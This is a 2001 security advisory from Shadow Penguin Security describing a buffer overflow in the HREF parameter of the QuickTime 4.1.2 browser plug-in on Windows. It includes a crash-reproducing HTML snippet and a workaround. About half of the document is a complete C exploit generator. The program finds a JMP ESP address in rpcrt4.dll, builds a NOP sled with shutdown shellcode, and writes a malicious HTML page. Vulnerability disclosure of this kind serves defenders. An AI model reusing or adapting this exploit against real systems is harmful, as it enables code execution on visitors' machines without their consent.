[ SOURCE: http://www.secureroot.com/security/advisories/9809701095.html ]

SPS Advisory #41



Apple Quick Time Plug-in Buffer Overflow



UNYUN <shadowpenguin@backsection.net>

Shadow Penguin Security (http://shadowpenguin.backsection.net)



--------------------------------------------------------------



[Date]

July 31, 2001



[Vulnerable]

QuickTime Player 4.1.2 for Windows (Japanese)



[Not vulnerable]

unknown



[Overview]

   There is a exploitable buffer overflow bug in quick time plug-in

for windows. This problem occurs when the visitor clicks the shown

movie in the browser. Quick time plug-in doesn't check the length of

HREF parameter in EMBED tag appropriately, Quick time overflows when

the long string is specified in HREF. This buffer overflow overwrites

the local buffer, the codes which are written in the EMBED tag can be

executed in the client host.



[Risk]

   If the HTML file which contains the cracking code in EMBED tag is

opened and visitor clicks the shown movie, the cracking code will be

executed on the client host. This overflow contains the possibility of

 the virus and trojans infection, sytsem destruction, intrusion, and

so on.



[Details]

   We explain the details of this problem under the environment of

Windows98(SE/Japanes)+QuickTime Player 4.1.2 for Windows+Internet

Explorer 5.0. You can check this problem easily by the following

simple HTML file.



<html>

<embed src="c:\program files\quicktime\sample.mov"

       href="aaaa... long string (730 characters)"

       width=60 height=60 autoplay="true"

       target="QUICKTIMEPLAYER">

</html>



* You must prepare a sample movie file to specify in "src" parameter.

* Write 730 bytes characters in "href" parameter.



Internet Explorer will crash by the buffer overflow when the shown

movie on browser is clicked. You will be able to see that EIP is

0x61616161 in GPF dialog box when Internet Explorer is crashed.



[Avoidance]

Disable the execution of ActiveX control and plug-in.



[Caution]

   We will change this information without any notice. Use of this

information constitutes acceptance for use in an AS IS condition.

There are NO warranties with regard to this information. In no event

shall the author be liable for any damages whatever arising out of or

in connection with the use or spread of this information. Any use of

this information is only for personal experiment.



[Comments ?]

   If you have something comments, please send to following address..



UNYUN <shadowpenguin@backsection.net>

http://shadowpenguin.backsection.net



[Sample code]

   This sample generates a HTML file which includes the code which

shutdowns Windows by using ExitWindowsEx API. The shutdown code is

written in EMBED tag, and executed by using this buffer overflow

problem. When you check this problem by the following sample code, you

 must set appropriate movie file in MOV_FILE (the movie file "sample.

mov" which is written in the following code is a sample which is

installed when Quick Time Player 4.1.2 is installed by default). This

sample code can be compiled by Visual C++ 6.0. This sample code was

checked under the environmentof Windows98 Second Edition (Japanese)+

Internet Explorer5.0.



/*====================================================================

   Apple QuickTime 4.1.2 plug-in exploit

   The Shadow Penguin Security (http://shadowpenguin.backsection.net)

   Written by UNYUN (shadowpenguin@backsection.net)

  ====================================================================

*/



#include    <stdio.h>

#include    <stdlib.h>

#include    <windows.h>



#define MOV_FILE    "c:\\program files\\quicktime\\sample.mov"

#define HEIGHT      60

#define WIDTH       60

#define TARGET      "QUICKTIMEPLAYER"

#define FILE_IMAGE  \

                    "<html><embed src=\"%s\" href=\"%s\" "\

                    "width=%d height=%d autoplay=\"true\" "\

                    "target=\"%s\"><br></html>"

#define BUFSIZE     730

#define RET         684

#define ESP_TGT     "rpcrt4.dll"

#define JMPESP_1    0xff

#define JMPESP_2    0xe4

#define NOP         0x90



unsigned char   exploit_code[200]={

        0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,

        0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,

        0xFF,0xD0,0x00,

};



main(int argc,char *argv[])

{

    FILE            *fp;

    char            buf[BUFSIZE];

    unsigned int    i,pretadr,p,ip,kp;

    MEMORY_BASIC_INFORMATION meminfo;



    if (argc<2){

        printf("usage : %s Output_HTML-fileName [Sample .mov file]\n",

               argv[0]);

        exit(1);

    }



    if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){

         printf("%s is not found.\n",ESP_TGT);

         exit(1);

    }



    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));

    pretadr=0;

    for (i=0;i<meminfo.RegionSize;i++){

        p=kp+i;

        if (  ( p     &0xff)==0

           || ((p>>8 )&0xff)==0

           || ((p>>16)&0xff)==0

           || ((p>>24)&0xff)==0) continue;

        if (   *((unsigned char *)p)==JMPESP_1

            && *(((unsigned char *)p)+1)==JMPESP_2)

            pretadr=p;

    }

    if ((fp=fopen(argv[1],"wb"))==NULL){

        printf("File write error \"%s\"\n",argv[1]);

        exit(1);

    }

    memset(buf,NOP,BUFSIZE);

    memcpy(buf+700-12,exploit_code,strlen(exploit_code));

    buf[BUFSIZE-2]=0;



    ip=pretadr;

    printf("EIP=%x\n",ip);

    buf[RET  ]=ip&0xff;

    buf[RET+1]=(ip>>8)&0xff;

    buf[RET+2]=(ip>>16)&0xff;

    buf[RET+3]=(ip>>24)&0xff;



    if (argc==2)

        fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);

    else

        fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);

    fclose(fp);

    printf("Done.\n");

 }



-----

UNYUN

% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]

   shadowpenguin@backsection.net (SPS-Official)

   unyun@shadowpenguin.org (Personal)

% eEye Digital Security Team [ http://www.eEye.com ]

   unyun@eEye.com